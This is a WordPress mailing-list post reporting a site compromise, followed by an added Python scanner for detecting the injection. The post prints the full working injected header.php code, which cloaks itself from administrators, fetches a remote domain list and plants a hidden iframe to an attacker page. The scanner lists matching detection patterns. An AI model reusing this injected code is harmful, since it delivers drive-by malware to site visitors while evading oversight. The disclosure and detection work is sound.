[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php

Raj Sekharan flarecore at gmail.com
Fri Oct 7 08:23:23 UTC 2011


Hope it helps someone.

On Fri, Oct 7, 2011 at 1:52 PM, Raj Sekharan <flarecore at gmail.com> wrote:

> My website was recently compromised, and my header.php file was appended
> with the following code:
>
> <!-- Wordpress Counter -->
> <?php
> if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
>  if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain =
> get_new_domain() ) ) {
>  add_option ( 'domain', $newdomain, '', 'no' );
> add_option ( 'domain_update', time (), '', 'no' );
>  }
> if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain =
> get_new_domain() ) ) {
>  update_option ( 'domain', $newdomain );
> update_option ( 'domain_update', time () );
>  }
>
> $domain = get_option ( 'domain' );
> if ($domain)
>  echo
> '<script language="javascript">
> var ExpDate = new Date ();
> ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
> SetCookie("MTPT","1",ExpDate, "/");
>
> function SetCookie (name, value) {
>  var argv = SetCookie.arguments;
>  var argc = SetCookie.arguments.length;
>  var expires = (argc > 2) ? argv[2] : null;
>  var path = (argc > 3) ? argv[3] : null;
>  var domain = (argc > 4) ? argv[4] : null;
>  var secure = (argc > 5) ? argv[5] : false;
>  document.cookie = name + "=" + escape (value) +
>  ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
>  ((path == null) ? "" : ("; path=" + path)) +
>  ((domain == null) ? "" : ("; domain=" + domain)) +
>  ((secure == true) ? "; secure" : "");
> }
> </script>
> <iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
> frameborder="0">
> </iframe>';
> }
>
> function get_new_domain () {
> $url = 'http://googlesafebrowsing.com/remoted.cc.txt';
>  if ( function_exists ( 'curl_init' ) ) {
> $ch = @curl_init ( $url );
>  @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
> $doms = @curl_exec ( $ch );
>  @curl_close ( $ch );
> }
> else
>  $doms = @file_get_contents ( $url );
>  if ( strpos ( $doms, '||' ) === false )
>   return false;
>
> $domains = explode ( '||', trim ( $doms ) );
>  return $domains[array_rand ( $domains )];
> }
> ?>
>
> <!-- Wordpress Counter -->
>
> Unlike before, where a dummy iframe was just appended, this one ensures that
> the logged-in administrator cannot actually encounter the malware code. The
> attacker even called it "WordPress Counter" in the comment.
>
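The injected block above is only served to visitors who are not logged in and do not yet carry the `MTPT` cookie, so an administrator browsing the site never sees it; a file-level scan of the theme directory is the reliable way to find it. The following scanner is an added example, not code from the original post or from WordPress: it walks a directory for `.php` files and scores each one against indicators taken only from the quoted fragment (the `Wordpress Counter` marker comment, the remote domain-list URL, the `get_new_domain` helper, the `domain_update` option name, the 1x1 iframe, the `!is_user_logged_in() && !isset($_COOKIE...` gate and the `MTPT` cookie). The rule weights and the reporting threshold are my own assumptions, and the two sample files are constructed for the demonstration.

```python
"""Added example (not part of the wp-hackers post): scan WordPress PHP files
for the indicators visible in the injected header.php fragment.

Assumptions (mine, not the post's): the weights below are a guess at how
specific each indicator is; a file over the threshold means "inspect this
file", not proof of compromise, and a lone tracking pixel stays under it.
"""
import os
import re
import sys
import tempfile
from typing import Dict, List, Tuple

# rule name -> (compiled regex, weight). The marker comment, the remote
# domain-list URL and the helper name are the most specific; the login/cookie
# gate and the hidden iframe also occur in legitimate code, so they weigh less.
RULES: Dict[str, Tuple[re.Pattern, int]] = {
    "marker_comment": (re.compile(r"<!--\s*Wordpress Counter\s*-->", re.I), 3),
    "domain_list_fetch": (re.compile(r"googlesafebrowsing\.com/remoted\.cc\.txt"), 5),
    "get_new_domain": (re.compile(r"\bget_new_domain\s*\("), 3),
    "domain_update_option": (re.compile(r"['\"]domain_update['\"]"), 2),
    "hidden_iframe": (re.compile(r"<iframe[^>]*width=\"1\"[^>]*height=\"1\"", re.I | re.S), 3),
    "login_cookie_gate": (
        re.compile(r"!\s*is_user_logged_in\s*\(\s*\)\s*&&\s*!\s*isset\s*\(\s*\$_COOKIE"), 2),
    "mtpt_cookie": (re.compile(r"['\"]MTPT['\"]"), 2),
}

SUSPECT_THRESHOLD = 5  # assumed: summed weight at or above which a file is reported


def scan_php_source(source: str) -> Dict[str, object]:
    """Return matched rule names, their summed weight and a suspect flag for one file's text."""
    hits: List[str] = [name for name, (rx, _) in RULES.items() if rx.search(source)]
    score = sum(RULES[name][1] for name in hits)
    return {"hits": hits, "score": score, "suspect": score >= SUSPECT_THRESHOLD}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk a directory (e.g. wp-content/) and report the PHP files over the threshold."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if result["suspect"]:
                findings.append({"path": path, **result})
    return findings


# Constructed sample: a condensed copy of the injected fragment's structure.
INJECTED_SAMPLE = """<!-- Wordpress Counter -->
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
  $domain = get_option ( 'domain' );
  if ($domain)
    echo '<iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1" frameborder="0"></iframe>';
}
?>
<!-- Wordpress Counter -->
"""

# Constructed sample: an ordinary theme header with nothing injected.
CLEAN_SAMPLE = """<?php /* constructed: ordinary theme header */ ?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head><?php wp_head(); ?></head>
<body <?php body_class(); ?>>
"""


def demo_scan_tree() -> int:
    """Write both samples into a temporary theme directory, scan it, return the suspect count."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in (("header.php", INJECTED_SAMPLE), ("footer.php", CLEAN_SAMPLE)):
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(text)
        return len(scan_tree(tmp))


if __name__ == "__main__":
    # Usage: python scan_theme.py /path/to/wp-content
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for finding in scan_tree(root):
        print(f"{finding['path']}: score={finding['score']} hits={', '.join(finding['hits'])}")
```

The scanner only covers files. The fragment also persists state in the database through `add_option('domain', ...)` and `add_option('domain_update', ...)`, so a clean-up that stops at header.php leaves those rows in `wp_options`; check for and remove them as well, and treat any remaining reference to the remote domain list as a reason to re-scan the whole install.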
